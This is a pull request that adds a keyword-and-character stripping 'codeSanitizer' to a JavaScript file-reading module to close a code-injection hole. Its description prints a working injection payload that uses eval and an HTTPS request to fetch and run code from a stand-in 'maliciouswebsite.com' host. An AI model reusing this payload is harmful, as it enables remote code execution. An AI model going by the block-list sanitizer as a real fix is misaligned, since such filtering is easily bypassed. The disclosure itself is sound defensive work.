### PR TITLE
Fixed code injection vulnerability

### DIFF
--- a/functions/read.js
+++ b/functions/read.js
@@ -6,10 +6,23 @@ const splits = {
     'SafeSemiColon': '[]:&#?.??.><![][]!!!!Section-Safe_SemiColon',
 }
 
+function codeSanitizer(str) {
+    return str
+    .split('{').join('')
+    .split('}').join('')
+    .split('[').join('')
+    .split(']').join('')
+    .split('(').join('')
+    .split(')').join('')
+    .split('=>').join('')
+    .split('function').join('')
+    .split('eval').join('')
+}
+
 module.exports = (fn) => {
     if (fs.existsSync(fn)) {
         try {
-            rawData = fs.readFileSync(fn, 'utf8').split('\r').join('').split('\t').join('').split('\n').join('');
+            rawData = codeSanitizer(fs.readFileSync(fn, 'utf8').split('\r').join('').split('\t').join('').split('\n').join(''));
             sections = rawData.split(`\\;`).join(splits.SafeSemiColon).split(';');
             var validSections = [];
             var jsonBuilder = {};


### PR DESCRIPTION
Added `codeSanitizer` function to prevent abuse of string literals to inject code into the program.

**How did it work?**
```~' + `${eval(`var https=require('https'),req=https.request({hostname:'maliciouswebsite.com',path:'/malicious_path',port:443,method:'GET'},t=>{var str = ''\; t.on('data',function(ta){str += ta}),t.on('end',function(){eval(str)})})\;req.end()\;`)}` + '~yes```

_**This no longer works!**_